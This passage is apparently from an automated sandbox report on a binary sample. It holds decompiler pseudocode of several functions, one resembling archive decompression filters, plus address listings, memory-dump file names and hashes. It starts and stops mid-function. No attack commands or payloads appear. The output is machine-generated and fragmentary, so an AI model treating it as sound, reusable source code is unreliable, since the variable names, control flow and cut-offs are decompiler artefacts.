								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E001A397F(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}

0x001a66a7
0x001a66ad
0x001a66b5
0x001a66dc
0x001a66df
0x001a66e5
0x001a66e8
0x001a66ea
0x001a6702
0x001a6709
0x001a670b
0x001a670e
0x001a6712
0x001a6717
0x001a6719
0x001a671b
0x001a671d
0x001a671d
0x001a671f
0x001a6723
0x001a6723
0x001a6725
0x001a6727
0x00000000
0x00000000
0x001a6729
0x001a6729
0x001a672b
0x001a6ca2
0x001a6ca3
0x00000000
0x001a6ca3
0x001a6731
0x001a673f
0x001a673f
0x001a6741
0x001a6750
0x001a6750
0x001a6756
0x001a6c9b
0x001a6c9b
0x00000000
0x001a6c9b
0x00000000
0x001a6756
0x001a6743
0x001a674a
0x00000000
0x00000000
0x00000000
0x001a674a
0x001a6733
0x001a6736
0x001a6739
0x00000000
0x00000000
0x00000000
0x001a675c
0x001a675c
0x001a6765
0x001a676b
0x001a676d
0x001a6770
0x001a6779
0x001a677a
0x001a6785
0x001a6789
0x001a678b
0x001a6792
0x001a6792
0x001a6797
0x001a6797
0x001a679d
0x001a67a8
0x001a67af
0x001a67b3
0x001a67b9
0x001a67c0
0x001a67c6
0x001a67cc
0x001a67d0
0x001a67fd
0x001a67fe
0x001a67ff
0x001a6801
0x001a681a
0x001a681d
0x001a6824
0x001a6827
0x001a682a
0x001a6832
0x001a683b
0x001a683f
0x001a6841
0x001a6844
0x001a6846
0x001a6846
0x001a6848
0x00000000
0x001a6848
0x001a6806
0x001a6809
0x001a6809
0x001a680b
0x00000000
0x00000000
0x001a680d
0x001a680e
0x001a6811
0x001a6814
0x00000000
0x00000000
0x00000000
0x001a6816
0x001a6818
0x00000000
0x001a67d2
0x001a67d4
0x001a67d7
0x001a67e1
0x001a67e9
0x001a67ee
0x001a67f1
0x001a6850
0x001a6855
0x001a6857
0x001a68a5
0x001a68ab
0x001a6b1e
0x001a6b20
0x001a6b71
0x001a6b77
0x001a6b86
0x001a6b87
0x001a6b91
0x001a6b94
0x001a6b9b
0x001a6ba1
0x001a6ba7
0x001a6bae
0x001a6bdb
0x001a6bdc
0x001a6bdd
0x001a6bdf
0x001a6bfb
0x001a6bfe
0x001a6c05
0x001a6c08
0x001a6c0b
0x001a6c16
0x001a6c22
0x001a6c24
0x001a6c2a
0x001a6c2c
0x001a6c2c
0x001a6c2e
0x001a6c36
0x001a6c36
0x001a6c39
0x001a6c3c
0x001a6c4a
0x001a6c4d
0x001a6c55
0x001a6c58
0x001a6c5a
0x001a6c5e
0x001a6c65
0x001a6c6d
0x001a6c6f
0x001a6c76
0x001a6c78
0x001a6c78
0x001a6c7b
0x001a6c7b
0x001a6c3e
0x001a6c3e
0x001a6c3e
0x001a6c82
0x001a6c86
0x001a6c86
0x001a6c8a
0x001a6c8e
0x001a6c92
0x001a6723
0x001a6723
0x001a6725
0x001a6727
0x00000000
0x00000000
0x00000000
0x001a6727
0x001a6723
0x001a6be7
0x001a6bea
0x001a6bea
0x001a6bec
0x00000000
0x00000000
0x001a6bee
0x001a6bef
0x001a6bf2
0x001a6bf5
0x00000000
0x00000000
0x00000000
0x001a6bf7
0x001a6bf9
0x00000000
0x001a6bf9
0x001a6bb2
0x001a6bb5
0x001a6bbf
0x001a6bc7
0x001a6bcc
0x001a6bcf
0x00000000
0x001a6bcf
0x001a6b79
0x001a6886
0x001a6886
0x001a688a
0x001a688e
0x00000000
0x001a688e
0x001a6b28
0x001a6b2a
0x001a6b34
0x001a6b3c
0x001a6b41
0x001a6b42
0x001a6b44
0x001a6b4d
0x001a6b54
0x001a6b5f
0x001a6b67
0x001a6b69
0x00000000
0x001a6b69
0x001a68b1
0x001a68b7
0x001a68ba
0x001a68c7
0x001a68ca
0x001a68d0
0x001a68d0
0x001a68bc
0x001a68bc
0x001a68bc
0x001a68d2
0x001a68d5
0x001a68d9
0x001a68db
0x001a68df
0x001a68e6
0x001a68f0
0x001a68f2
0x001a68fb
0x001a68fd
0x001a68fd
0x001a6900
0x001a6900
0x001a6905
0x001a690c
0x001a6912
0x001a6918
0x001a691f
0x001a694c
0x001a694d
0x001a694e
0x001a6950
0x001a696c
0x001a696f
0x001a6976
0x001a6979
0x001a697c
0x001a6987
0x001a6993
0x001a6995
0x001a699b
0x001a699d
0x001a699d
0x001a699f
0x00000000
0x001a699f
0x001a6958
0x001a695b
0x001a695b
0x001a695d
0x00000000
0x00000000
0x001a695f
0x001a6960
0x001a6963
0x001a6966
0x00000000
0x00000000
0x00000000
0x001a6968
0x001a696a
0x00000000
0x001a6921
0x001a6923
0x001a6926
0x001a6930
0x001a6938
0x001a693d
0x001a6940
0x001a69a7
0x001a69a7
0x001a69aa
0x001a69ad
0x001a69bd
0x001a69c0
0x001a69c0
0x001a69af
0x001a69af
0x001a69af
0x001a69c2
0x001a69c3
0x001a69c7
0x001a69c9
0x001a69cb
0x001a6ad9
0x001a6ad9
0x001a6adf
0x001a6ae5
0x001a6ae6
0x001a6aea
0x001a6af0
0x001a6af2
0x001a6af3
0x001a6af7
0x001a6afd
0x001a6aff
0x001a6aff
0x001a6b00
0x001a6b00
0x001a6afd
0x001a6af0
0x001a6b04
0x001a6b0c
0x001a6b12
0x001a6b16
0x00000000
0x001a69d1
0x001a69d1
0x001a69d4
0x001a6ab5
0x001a6abe
0x001a6ac6
0x001a6aca
0x001a6ad1
0x001a6ad3
0x001a6ad3
0x001a6ad6
0x00000000
0x001a6ad6
0x001a69da
0x001a69de
0x001a69e7
0x001a69f5
0x001a69f9
0x001a6a00
0x001a6a02
0x001a6a02
0x001a6a05
0x001a6a05
0x001a6a0a
0x001a6a11
0x001a6a17
0x001a6a1d
0x001a6a24
0x001a6a51
0x001a6a52
0x001a6a53
0x001a6a55
0x001a6a71
0x001a6a74
0x001a6a7b
0x001a6a7e
0x001a6a81
0x001a6a8c
0x001a6a98
0x001a6a9a
0x001a6aa0
0x001a6aa2
0x001a6aa2
0x001a6aa4
0x00000000
0x001a6aa4
0x001a6a5d
0x001a6a60
0x001a6a60
0x001a6a62
0x00000000
0x00000000
0x001a6a64
0x001a6a65
0x001a6a68
0x001a6a6b
0x00000000
0x00000000
0x00000000
0x001a6a6d
0x001a6a6f
0x00000000
0x001a6a26
0x001a6a28
0x001a6a2b
0x001a6a35
0x001a6a3d
0x001a6a42
0x001a6a45
0x001a6aac
0x001a6aaf
0x00000000
0x001a6aaf
0x001a6a24
0x001a69cb
0x001a691f
0x001a6859
0x001a6860
0x001a6897
0x001a6897
0x001a689c
0x001a689f
0x00000000
0x001a689f
0x001a6862
0x001a6866
0x00000000
0x00000000
0x001a6868
0x001a686e
0x001a686f
0x001a6872
0x00000000
0x00000000
0x001a6874
0x001a6875
0x001a687c
0x001a6880
0x001a6880
0x001a6880
0x00000000
0x001a6880
0x001a67d0
0x001a6723
0x001a66ec
0x00000000
0x001a66b7
0x001a66ba
0x001a66be
0x001a66c2
0x001a66c6
0x001a66c7
0x001a66ce
0x00000000
0x001a66d0
0x001a66d0
0x00000000
0x001a66d0
0x001a66ce

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c5a05976191a686a2b332855ad20d3b2312d93676eb313e91a33e14f9b22a2
Instruction ID: 6561a064189dc33dcc748c50f9b71eef0310ec355c80f545b71d521ffdaaae82
Opcode Fuzzy Hash: e4c5a05976191a686a2b332855ad20d3b2312d93676eb313e91a33e14f9b22a2
Instruction Fuzzy Hash: 9812D2B56047068FC72DCF28C9906B9B3E1FF55308F18892EE597C7A85D378A894CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0019BAD1, Relevance: .4, Instructions: 449
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0019BAD1(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				signed int _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed int _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed char _t309;
				signed int _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed char _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed char _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *(_t355 + 0x60) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *(_t355 + 0x60);
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x28) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x30) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0x1cd070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x28);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *((intOrPtr*)(_t355 + 0x64)) = 0;
						 *(_t355 + 0x38) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E0019C03A(_t277, _t175, 4) == 5) {
									E0019C085(_t277, E0019C03A(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x34);
								_t285 =  *(_t355 + 0x60);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x60) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x30);
						_t316 =  *(_t355 + 0x28);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x28) = _t316;
						 *(_t355 + 0x30) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x60) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x28) = _t289;
					 *(_t355 + 0x34) = _t278;
					 *(_t355 + 0x3c) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x24) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x14) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x1c) = 0;
						 *(_t355 + 0x10) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x60);
							_t221 =  *(_t355 + 0x34) - _t351;
							_t352 =  *(_t355 + 0x34);
							 *(_t355 + 0x20) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x30) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x2c) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x3c) = E001B4E62(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x24) = E001B4E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t234 = E001B4E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t292 =  *((intOrPtr*)(_t355 + 0x44));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x18);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
										_t279 =  *(_t355 + 0x30);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x2c);
										}
									} else {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
									}
								}
								_t223 =  *(_t355 + 0x24);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x24) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x20);
							} while ( &(_t334[ *(_t355 + 0x20)]) < _t289);
							_t351 =  *(_t355 + 0x14);
							_t218 =  *(_t355 + 0x1c);
							_t319 =  *(_t355 + 0x10);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x1c) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x3c);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x2c) = _t293;
					 *(_t355 + 0x30) = _t235;
					 *(_t355 + 0x38) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x34) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x18) =  *(_t355 + 0x18) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0x00000000;
							 *(_t355 + 0x60) =  *(_t355 + 0x60) & 0;
							 *(_t355 + 0x1c) = 0;
							E001AE920(_t336, _t355 + 0x40, 0, 0x1c);
							 *(_t355 + 0x34) =  *(_t355 + 0x34) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x24) = _t336;
							if(_t336 <  *(_t355 + 0x30)) {
								_t238 =  *(_t355 + 0x60);
								do {
									_t322 =  *(_t355 + 0x1c);
									 *(_t355 + 0x14) = _t322 -  *(_t355 + 0x18);
									_t297 =  *(_t355 + 0x2c);
									 *(_t355 + 0x18) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x2c) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x14) * _t238 + _t345 *  *(_t355 + 0x14) + _t353 *  *(_t355 + 0x1c) +  *(_t355 + 0x20) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x24) +  *(_t355 + 0x38)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x20) = _t304 -  *(_t355 + 0x20);
									 *(_t355 + 0x24) = _t304;
									 *((intOrPtr*)(_t355 + 0x44)) =  *((intOrPtr*)(_t355 + 0x44)) + E001B4E62(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E001B4E62(_t323, (_t323 << 3) -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E001B4E62(_t323,  *(_t355 + 0x20) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E001B4E62(_t323, (_t323 << 3) -  *(_t355 + 0x20));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E001B4E62(_t323,  *(_t355 + 0x24) + _t349);
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E001B4E62(_t323, _t349 -  *(_t355 + 0x14));
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E001B4E62(_t323, _t349 +  *(_t355 + 0x14));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x28) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x10);
										_t238 =  *(_t355 + 0x60);
									} else {
										_t324 =  *(_t355 + 0x40);
										_t266 = 0;
										 *(_t355 + 0x40) =  *(_t355 + 0x40) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x40 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x40 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x40 + _t308 * 4) =  *(_t355 + 0x40 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x10);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x10) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x60) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x60);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x24) + _t281;
									 *(_t355 + 0x28) =  *(_t355 + 0x28) + 1;
									 *(_t355 + 0x24) = _t306;
								} while (_t306 <  *(_t355 + 0x30));
								_t336 =  *(_t355 + 0x34);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x34) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x28) = _t309;
				 *(_t355 + 0x60) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x24) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x60)) {
							_t310 =  *(_t355 + 0x60);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x28);
								_t274 =  *(_t355 + 0x24);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x28) = _t309;
						 *(_t355 + 0x24) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}

0x0019bad1
0x0019badb
0x0019bae0
0x0019bb77
0x00000000
0x0019bb77
0x0019bae9
0x0019bfc1
0x0019bfc4
0x0019bfc6
0x0019bfc9
0x0019bfd2
0x0019c033
0x00000000
0x0019c033
0x0019bfda
0x0019bfdc
0x0019bfde
0x0019bfe4
0x00000000
0x00000000
0x00000000
0x00000000
0x0019bfea
0x0019bfea
0x0019bfea
0x0019bfec
0x0019bfed
0x0019bfee
0x0019bff2
0x0019bff8
0x0019bffc
0x0019c00f
0x0019c017
0x0019c01b
0x0019c01b
0x0019bffe
0x0019c003
0x0019c005
0x0019c00b
0x0019c00b
0x0019c003
0x0019c01d
0x0019c021
0x0019c024
0x0019c027
0x0019c027
0x0019c02a
0x00000000
0x0019c02e
0x0019baf2
0x0019befb
0x0019befd
0x0019bf06
0x00000000
0x00000000
0x0019bf0f
0x0019bf12
0x0019bf18
0x00000000
0x00000000
0x0019bf22
0x0019bf23
0x0019bf27
0x0019bf2d
0x0019bf30
0x00000000
0x00000000
0x0019bf32
0x0019bf3a
0x00000000
0x00000000
0x0019bf3c
0x0019bf40
0x0019bf42
0x0019bf47
0x0019bf4b
0x0019bf4f
0x0019bf50
0x0019bf57
0x0019bf5b
0x0019bf6a
0x0019bf85
0x0019bf85
0x0019bf8a
0x0019bf8e
0x0019bf8e
0x0019bf92
0x0019bf93
0x0019bf96
0x0019bf9a
0x0019bf9f
0x0019bfa3
0x0019bfa7
0x0019bfa7
0x0019bfaa
0x0019bfab
0x0019bfae
0x0019bfb2
0x0019bfb2
0x00000000
0x0019bfbc
0x0019bafb
0x0019bdaf
0x0019bdb2
0x0019bdb5
0x0019bdb8
0x0019bdbc
0x0019bdbf
0x0019bdc6
0x0019bdca
0x0019bdd3
0x00000000
0x0019bdea
0x0019bdea
0x0019bdec
0x0019bdf0
0x0019bdf3
0x0019bdf7
0x0019bdfb
0x0019bdfd
0x0019be01
0x0019be05
0x0019be05
0x0019be09
0x00000000
0x00000000
0x0019be0f
0x0019be16
0x0019be1a
0x0019be1c
0x0019be20
0x0019be24
0x0019be28
0x0019be2a
0x0019be2d
0x0019be35
0x0019be3b
0x0019be49
0x0019be5e
0x0019be62
0x0019be67
0x0019be6b
0x0019be6e
0x0019be74
0x0019be84
0x0019be8a
0x0019be8e
0x0019be92
0x0019be94
0x0019be94
0x0019be7a
0x0019be7a
0x0019be7e
0x0019be7e
0x0019be74
0x0019be98
0x0019be9f
0x0019bea2
0x0019beaa
0x0019bead
0x0019beb4
0x0019beb4
0x0019bebe
0x0019bec2
0x0019bec6
0x0019beca
0x0019beca
0x0019becb
0x0019becf
0x0019bed8
0x0019bedc
0x0019beef
0x0019bee1
0x0019bee5
0x0019bee8
0x0019beec
0x0019beec
0x00000000
0x0019bef3
0x0019bdd3
0x0019bb04
0x0019bb83
0x0019bb86
0x0019bb88
0x0019bb8b
0x0019bb91
0x0019bb95
0x0019bb9e
0x00000000
0x0019bbb8
0x0019bbb8
0x0019bbba
0x0019bbc0
0x00000000
0x00000000
0x00000000
0x00000000
0x0019bbc2
0x0019bbc2
0x0019bbc2
0x0019bbcb
0x0019bbd0
0x0019bbd2
0x0019bbd7
0x0019bbd9
0x0019bbde
0x0019bbe6
0x0019bbea
0x0019bbef
0x0019bbf3
0x0019bbf6
0x0019bbfe
0x0019bc04
0x0019bc08
0x0019bc08
0x0019bc16
0x0019bc1a
0x0019bc23
0x0019bc27
0x0019bc2b
0x0019bc54
0x0019bc56
0x0019bc65
0x0019bc69
0x0019bc6d
0x0019bc76
0x0019bc86
0x0019bc96
0x0019bca6
0x0019bcb6
0x0019bcc4
0x0019bcd1
0x0019bcd5
0x0019bcdd
0x0019bd79
0x0019bd7d
0x0019bce3
0x0019bce3
0x0019bce7
0x0019bce9
0x0019bcef
0x0019bcf0
0x0019bcf4
0x0019bcf6
0x0019bcfa
0x0019bcfa
0x0019bcfc
0x0019bd01
0x0019bd02
0x0019bd07
0x0019bd0b
0x0019bd0e
0x0019bd6d
0x0019bd74
0x0019bd76
0x0019bd76
0x00000000
0x0019bd74
0x0019bd10
0x0019bd13
0x0019bd61
0x0019bd68
0x0019bd6a
0x0019bd6a
0x00000000
0x0019bd68
0x0019bd15
0x0019bd18
0x0019bd51
0x0019bd58
0x00000000
0x00000000
0x0019bd5a
0x0019bd5b
0x0019bd5b
0x00000000
0x0019bd5b
0x0019bd1a
0x0019bd1d
0x0019bd45
0x0019bd4c
0x00000000
0x00000000
0x0019bd4e
0x00000000
0x0019bd4e
0x0019bd1f
0x0019bd22
0x0019bd39
0x0019bd40
0x00000000
0x00000000
0x0019bd42
0x0019bd33
0x0019bd33
0x00000000
0x0019bd33
0x0019bd27
0x0019bd2b
0x00000000
0x0019bd32
0x0019bd32
0x00000000
0x0019bd32
0x0019bd2b
0x0019bd81
0x0019bd85
0x0019bd87
0x0019bd8b
0x0019bd8f
0x0019bd99
0x0019bd99
0x0019bd9d
0x0019bd9e
0x0019bda2
0x00000000
0x0019bdaa
0x0019bb9e
0x0019bb09
0x00000000
0x00000000
0x0019bb0b
0x0019bb0e
0x0019bb10
0x0019bb13
0x0019bb1a
0x0019bb24
0x00000000
0x0019bb3e
0x0019bb3e
0x0019bb40
0x0019bb44
0x0019bb44
0x0019bb46
0x0019bb4c
0x0019bb4e
0x0019bb4e
0x0019bb52
0x0019bb52
0x0019bb54
0x0019bb57
0x0019bb58
0x0019bb5b
0x0019bb5f
0x00000000
0x0019bb61
0x0019bb61
0x0019bb65
0x00000000
0x0019bb65
0x0019bb5f
0x0019bb69
0x0019bb69
0x0019bb6a
0x0019bb6d
0x0019bb71
0x0019bb71
0x00000000
0x0019bb44

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd46deb4285285989253233ffcd0501befac4f2e2947556a3391bdd28ca9c2de
Instruction ID: e6df89aa5a41209b59b5452502438253f981e3a09dedd7790ca4d3391637979e
Opcode Fuzzy Hash: cd46deb4285285989253233ffcd0501befac4f2e2947556a3391bdd28ca9c2de
Instruction Fuzzy Hash: 87F18871A083418FCB18CE29D6C456ABBE6FBD9318F184A2EF4C687255D734E905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001B0113, Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001B0113(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

